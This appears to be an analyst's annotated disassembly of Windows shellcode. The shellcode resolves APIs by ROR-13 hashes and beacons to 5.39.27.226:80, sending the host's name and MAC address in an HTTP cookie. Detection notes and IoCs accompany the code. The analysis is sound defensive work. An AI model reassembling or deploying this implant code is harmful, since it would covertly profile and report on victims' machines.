; Input SHA256 : 3A74FBDF96B5E73F930F5887A82E4008FFB8484AE180DD3F7DE7480BC5577345
; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA
; Input CRC32 : B326AB6B
; ---------------------------------------------------------------------------
; File Name : D:\_anal_temp\shellcode2.bin
; Format : Binary file
; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
seg000 segment byte public 'CODE' use32
assume cs:seg000
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
; Entry point (offset 0). The call pushes the address of sub_6 (offset 6) as
; its return address; sub_8F pops that into ebp and from then on uses ebp both
; as the API-resolver entry ("call ebp") and as the base for every string and
; scratch-byte reference in this blob ([ebp+NNNh]). cld fixes the direction
; flag for the lodsb/movsb/scasb loops below.
cld
call sub_8F
; =============== S U B R O U T I N E =======================================
sub_6 proc near
; Hash-based Win32 API resolver. Invoked as "call ebp" with the wanted hash
; pushed as its only argument: [esp] = return address, [esp+4] = hash.
; Walks PEB -> Ldr -> InMemoryOrderModuleList. For each module it computes a
; ROR-13 rolling hash over the upper-cased UTF-16 base name (byte-wise, so the
; zero bytes take part), then walks that module's export name table adding the
; ROR-13 hash of each ASCII export name (its NUL included) and compares the
; sum with the argument. On a match the export's VA is stored into pusha's
; saved-eax slot, all registers are restored, the hash argument is removed
; from the stack and execution jumps to the API, which therefore returns
; straight to sub_6's caller.
; No terminating condition: if nothing matches, the circular module list is
; walked forever. Forwarded exports are not handled.
; Detection note: the fs:[30h] PEB read followed by ROR-13 name hashing is a
; well-known shellcode API-resolution fingerprint.
var_4 = dword ptr -4
pusha ; saves eax..edi (32 bytes); the eax slot is [ebp+1Ch] after the mov below
mov ebp, esp ; frame: [ebp+20h] = return address, [ebp+24h] = hash argument
xor edx, edx
mov edx, fs:[edx+30h] ; edx = PEB
mov edx, [edx+0Ch] ; edx = PEB->Ldr
mov edx, [edx+14h] ; edx = InMemoryOrderModuleList.Flink (LDR entry, biased by the link offset)
loc_15: ; CODE XREF: sub_6+87j
mov esi, [edx+28h] ; esi = BaseDllName.Buffer (UTF-16)
movzx ecx, word ptr [edx+26h] ; ecx = BaseDllName.MaximumLength (in bytes)
xor edi, edi ; edi = module-name hash
loc_1E: ; CODE XREF: sub_6+26j
xor eax, eax
lodsb
cmp al, 61h ; 'a'
jl short loc_27
sub al, 20h ; ' ' -- fold lower-case ASCII to upper-case
loc_27: ; CODE XREF: sub_6+1Dj
ror edi, 0Dh
add edi, eax
loop loc_1E
push edx ; [ebp-4] = current LDR entry
push edi ; [ebp-8] = module-name hash
mov edx, [edx+10h] ; edx = DllBase
mov eax, [edx+3Ch] ; e_lfanew
add eax, edx ; eax = IMAGE_NT_HEADERS
mov eax, [eax+78h] ; export directory RVA (DataDirectory[0])
test eax, eax
jz short loc_89 ; module without exports: try the next one
add eax, edx ; eax = IMAGE_EXPORT_DIRECTORY
push eax ; saved; reloaded into eax once a name matches
mov ecx, [eax+18h] ; ecx = NumberOfNames
mov ebx, [eax+20h] ; AddressOfNames RVA
add ebx, edx ; ebx = name pointer table
loc_4A: ; CODE XREF: sub_6+60j
; Scan export names from last to first; on a match ecx is the name index.
jecxz short loc_88
dec ecx
mov esi, [ebx+ecx*4]
add esi, edx ; esi = export name (ASCII)
xor edi, edi ; edi = function-name hash
loc_54: ; CODE XREF: sub_6+58j
xor eax, eax
lodsb
ror edi, 0Dh
add edi, eax
cmp al, ah ; ah is 0: loop until the NUL itself has been hashed
jnz short loc_54
add edi, [ebp-8] ; edi = module hash + function hash
cmp edi, [ebp+24h] ; compare with the requested hash
jnz short loc_4A
pop eax ; eax = export directory
mov ebx, [eax+24h] ; AddressOfNameOrdinals RVA
add ebx, edx
mov cx, [ebx+ecx*2] ; cx = ordinal for name index ecx
mov ebx, [eax+1Ch] ; AddressOfFunctions RVA
add ebx, edx
mov eax, [ebx+ecx*4] ; function RVA
add eax, edx ; eax = function VA
mov [esp+28h+var_4], eax ; [esp+24h] = [ebp+1Ch] = pusha's saved eax
pop ebx ; discard module hash
pop ebx ; discard LDR entry
popa ; eax = resolved address, everything else restored
pop ecx ; ecx = return address of sub_6's caller
pop edx ; drop the hash argument
push ecx ; put the return address back so the API returns to that caller
jmp eax ; tail-jump into the resolved API
; ---------------------------------------------------------------------------
loc_88: ; CODE XREF: sub_6:loc_4Aj
pop eax ; no export matched in this module: drop export directory
loc_89: ; CODE XREF: sub_6+37j
pop edi
pop edx
mov edx, [edx] ; next InMemoryOrder entry
jmp short loc_15
sub_6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_8F proc near ; CODE XREF: seg000:00000001p
; Payload body (noreturn). ebp = address of sub_6 (popped from the entry
; call's return address), so "call ebp" invokes the hash resolver and
; [ebp+NNNh] addresses the strings and scratch bytes at the end of the blob.
; Behaviour visible in this listing:
;   1. LoadLibraryA("ws2_32"), LoadLibraryA("IPHLPAPI"), WSAStartup.
;   2. WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0) and up to three connect()
;      attempts to 5.39.27.226:80.
;   3. gethostname(), gethostbyname() for the local IPv4 address, then
;      SendARP() against that address to obtain the host's own MAC.
;   4. Builds, in place after the GET template at ebp+2A7h:
;      "GET /0a821a80/05dc0212 HTTP/1.1\r\nHost: <hostname, max 32>\r\n"
;      "Cookie: MC=<12 upper-case hex chars of the MAC>\r\n"
;      "Accept-Encoding: gzip\r\n\r\n" and send()s it once; the reply is
;      never read.
;   5. closesocket() and RtlExitUserThread(0) on every exit path.
; Register roles: ebp = resolver/base, ebx = socket, esi/edi = movsb pointers.
; The assembled request grows past the string table and, by offset
; arithmetic, past the 2FCh bytes loaded, so the blob must sit in writable
; memory with slack after it (it also writes into its own body, see
; [ebp+244h] / [ebp+248h] below).
; Network IoCs for detection: 5.39.27.226:80, URI /0a821a80/05dc0212,
; cookie "MC=" followed by the host's MAC address in hex.
pop ebp ; ebp = sub_6 = blob base
lea eax, [ebp+297h] ; ws2_32
push eax
push kernel32_LoadLibraryA_hash
call ebp ; LoadLibraryA("ws2_32")
test eax, eax
jz loc_22B ; exit the thread if the DLL cannot be loaded
lea eax, [ebp+29Eh] ; IPHLPAPI
push eax
push kernel32_LoadLibraryA_hash
call ebp ; LoadLibraryA("IPHLPAPI")
test eax, eax
jz loc_22B
mov ebx, 190h ; 190h = sizeof(WSADATA) on x86; also reused as wVersionRequested
sub esp, ebx ; WSADATA buffer on the stack
push esp ; lpWSAData
push ebx ; wVersionRequested
push ws2_32_WSAStartup_hash
call ebp ; WSAStartup(190h, &wsadata)
add esp, ebx
test eax, eax
jnz loc_22B ; non-zero return = failure; eax is 0 from here on
push eax ; dwFlags = 0
push eax ; g = 0
push eax ; lpProtocolInfo = 0
push eax ; protocol = 0
inc eax
push eax ; type = 1 (SOCK_STREAM)
inc eax
push eax ; af = 2 (AF_INET)
push ws2_32_WSASocketA_hash
call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0)
xor ebx, ebx
not ebx ; ebx = INVALID_SOCKET (-1)
cmp ebx, eax
jz loc_22B
mov ebx, eax ; ebx = socket for the rest of the routine
loc_F3: ; CODE XREF: sub_8F+8Bj
; Build a sockaddr_in on the stack: sin_addr=5.39.27.226, sin_port=htons(80),
; sin_family=2. Only 8 bytes are written; namelen 10h lets connect() read the
; 8 bytes above as sin_zero. The 8 bytes are not popped between retries.
push 0E21B2705h ; 5.39.27.226
push small 5000h ; 80
xor ecx, ecx
add cl, 2 ; AF_INET
push cx
mov edx, esp ; edx = &sockaddr_in
push 10h ; namelen
push edx ; name
push ebx ; s
push ws2_32_connect_hash
call ebp ; connect(s, &sa, 16)
test eax, eax
jz short loc_11C
; Retry counter stored inside the blob: by offset arithmetic (ebp = 6) this
; is the byte "3" following get_str_len. Once it reaches zero the code falls
; through and continues with an unconnected socket.
dec byte ptr [ebp+248h]
jnz short loc_F3
loc_11C: ; CODE XREF: sub_8F+83j
mov eax, 100h
sub esp, eax ; 256-byte hostname buffer
mov edx, esp
push edx ; extra copy of the buffer pointer, recovered by "pop edi" below
push eax ; namelen = 256
push edx ; name
push ws2_32_gethostname_hash
call ebp ; gethostname(buf, 256); stdcall pops the two arguments only
pop edi ; edi = hostname buffer (the surviving third push)
add esp, 100h ; buffer is now below esp; later pushes only overwrite its tail
test eax, eax
jnz loc_234
push edi
call get_str_len ; ecx = strlen(hostname)
pop esi ; esi = hostname
mov edx, ecx ; edx = hostname length
lea edi, [ebp+2A7h] ; GET /0a821a80/05dc0212 HTTP/1.1
; Host:
call get_str_len
dec edi ; edi = the template's NUL terminator: append point
cmp edx, 20h ; ' '
jl short loc_15D
mov edx, 20h ; ' ' -- hostname clipped to 32 bytes
loc_15D: ; CODE XREF: sub_8F+C7j
mov ecx, edx
push esi
rep movsb ; append the hostname after "Host: "
mov ecx, 0Dh
lea esi, [ebp+28Ah] ; Cookie:  -- 13 bytes: CR LF "Cookie: MC="
rep movsb
mov [ebp+244h], edi ; save the append point in a 4-byte slot inside the blob (self-write)
pop esi
push esi
push ws2_32_gethostbyname_hash ; gets computername
call ebp ; gethostbyname(hostname)
test eax, eax
jz loc_234
mov cx, [eax+0Ah] ; hostent.h_length
cmp cx, 4
jb loc_234 ; need an IPv4-sized address
lea eax, [eax+0Ch] ; &hostent.h_addr_list
mov eax, [eax]
mov ecx, [eax] ; h_addr_list[0]
mov ecx, [ecx] ; ecx = local IPv4 address as a dword
mov eax, 100h
push eax ; ULONG PhyAddrLen = 256
mov edi, esp ; edi = &PhyAddrLen
sub esp, eax ; 256-byte MAC buffer
mov esi, esp ; esi = MAC buffer
push edi ; PhyAddrLen
push esi ; pMacAddr
push ecx ; SrcIP = own address
push ecx ; DestIP = own address
push IPHLPAPI_SendARP_hash
call ebp ; SendARP(ownIP, ownIP, mac, &len): yields this host's own MAC
test eax, eax ; result is never used: the add below rewrites the flags before any jump
add esp, 104h ; frees both buffers; edi/esi still point below esp, nothing is pushed before they are read
movzx ecx, word ptr [edi] ; low word of PhyAddrLen
cmp ecx, 6
jb short loc_234 ; no 6-byte MAC returned
mov ecx, 6 ; hex-encode exactly 6 bytes
mov eax, 10h
sub esp, eax ; 16-byte buffer for the 12 hex characters
mov edi, esp
mov edx, ecx
shl edx, 1 ; edx = 12 = output length
push eax
push edx
loc_1D8: ; CODE XREF: sub_8F+173j
; Per MAC byte: high nibble, then low nibble; 0-9 -> '0'..'9', 0Ah-0Fh -> 'A'..'F' (37h + 0Ah = 'A').
xor edx, edx
mov dl, [esi]
mov al, dl
and al, 0F0h
shr al, 4
cmp al, 9
ja short loc_1EB
add al, 30h ; '0'
jmp short loc_1ED
; ---------------------------------------------------------------------------
loc_1EB: ; CODE XREF: sub_8F+156j
add al, 37h ; '7'
loc_1ED: ; CODE XREF: sub_8F+15Aj
mov [edi], al
inc edi
mov al, dl
and al, 0Fh
cmp al, 9
ja short loc_1FC
add al, 30h ; '0'
jmp short loc_1FE
; ---------------------------------------------------------------------------
loc_1FC: ; CODE XREF: sub_8F+167j
add al, 37h ; '7'
loc_1FE: ; CODE XREF: sub_8F+16Bj
mov [edi], al
inc edi
inc esi
loop loc_1D8
pop ecx ; ecx = 12
sub edi, ecx ; edi = start of the hex string
mov esi, edi
pop eax
add esp, eax ; release the 16-byte buffer; esi still points into it, no push before the copy
mov edi, [ebp+244h] ; append point after "MC="
rep movsb ; copy the 12 hex characters
call mem_copy ; append CR LF "Accept-Encoding: gzip" CR LF CR LF; ecx = request length, edi = past its NUL
xor eax, eax
push eax ; flags = 0
push ecx ; len
sub edi, ecx
dec edi ; edi = start of the request (ebp+2A7h)
push edi ; buf
push ebx ; s
push ws2_32_send_hash
call ebp ; send(s, request, len, 0): a single beacon, nothing is received
jmp short loc_234
; ---------------------------------------------------------------------------
loc_22B: ; CODE XREF: sub_8F+11j sub_8F+27j ...
push 0
push ntdll_RtlExitUserThread_hash
call ebp ; RtlExitUserThread(0)
loc_234: ; CODE XREF: sub_8F+A9j sub_8F+F1j ...
push ebx
push ws2_32_closesocket_hash
call ebp ; closesocket(s)
jmp short loc_22B
sub_8F endp
; =============== S U B R O U T I N E =======================================
get_str_len proc near ; CODE XREF: sub_8F+B0p sub_8F+BEp ...
; strlen-style helper. In: edi = NUL-terminated string, direction flag clear.
; Out: ecx = length excluding the NUL, edi = one past the NUL, eax = 0.
; Clobbers flags. The scan is unbounded: it relies on a terminator existing.
xor ecx, ecx
not ecx ; ecx = -1: no count limit
xor eax, eax ; al = 0: byte to search for
repne scasb ; stops after the NUL; ecx = -1 - (len + 1)
not ecx ; ecx = len + 1
dec ecx ; ecx = len
retn
get_str_len endp
; ---------------------------------------------------------------------------
; Writable scratch embedded in the code (offsets derived from the listing
; layout with ebp = 6; confirm against the raw bytes): the alignment padding
; plus the two zero bytes form the 4-byte slot sub_8F stores its append
; pointer into ([ebp+244h]), and the trailing 3 is the connect() retry
; counter decremented at [ebp+248h]. The blob therefore has to reside in
; writable (RWX) memory.
align 4
db 2 dup(0), 3
; =============== S U B R O U T I N E =======================================
mem_copy proc near ; CODE XREF: sub_8F+185p
; Appends the fixed request tail to the HTTP request being built at ebp+2A7h
; and returns its final length. Copies 4Fh (79) bytes from ebp+26Eh although
; the tail string (CR LF "Accept-Encoding: gzip" CR LF CR LF NUL) is only 28
; bytes; the surplus bytes land after the NUL and are ignored by the length
; scan. In: ebp = blob base. Out: ecx = strlen(request), edi = one past its
; NUL, eax = 0. Clobbers esi, flags.
lea edi, [ebp+2A7h] ; request buffer (the GET template)
call get_str_len
dec edi ; edi = the request's NUL: append point
mov ecx, 4Fh ; 'O'
lea esi, [ebp+26Eh] ; Accept-Encoding: gzip
rep movsb
lea edi, [ebp+2A7h]
call get_str_len ; ecx = total request length for send()
retn
mem_copy endp
; ---------------------------------------------------------------------------
; String table addressed relative to ebp (= sub_6 = offset 6):
;   ebp+26Eh -> aAcceptEncoding : request tail appended by mem_copy
;   ebp+28Ah -> the 13 bytes CR LF "Cookie: MC=" appended after the hostname
;   ebp+297h -> "ws2_32", ebp+29Eh -> "IPHLPAPI" : LoadLibraryA arguments
;   ebp+2A7h -> request template; hostname, cookie, MAC and tail are written
;               in place after its NUL, so the request grows beyond this table
;               and, by offset arithmetic, beyond the 2FCh bytes loaded.
aAcceptEncoding db 0Dh,0Ah
db 'Accept-Encoding: gzip',0Dh,0Ah
db 0Dh,0Ah,0
db 0Dh
db 0Ah
aCookie db 'Cookie: '
aMc db 'MC='
aWs2_32 db 'ws2_32'
db 0
aIphlpapi db 'IPHLPAPI',0
aGet0a821a8005d db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah
db 'Host: ',0
align 4
; Trailing area: lies inside the region the assembled request is written
; into at run time. 41900000h is not referenced by any code in this listing;
; its meaning is not evident from here.
dd 8 dup(0)
dd 41900000h
seg000 ends
end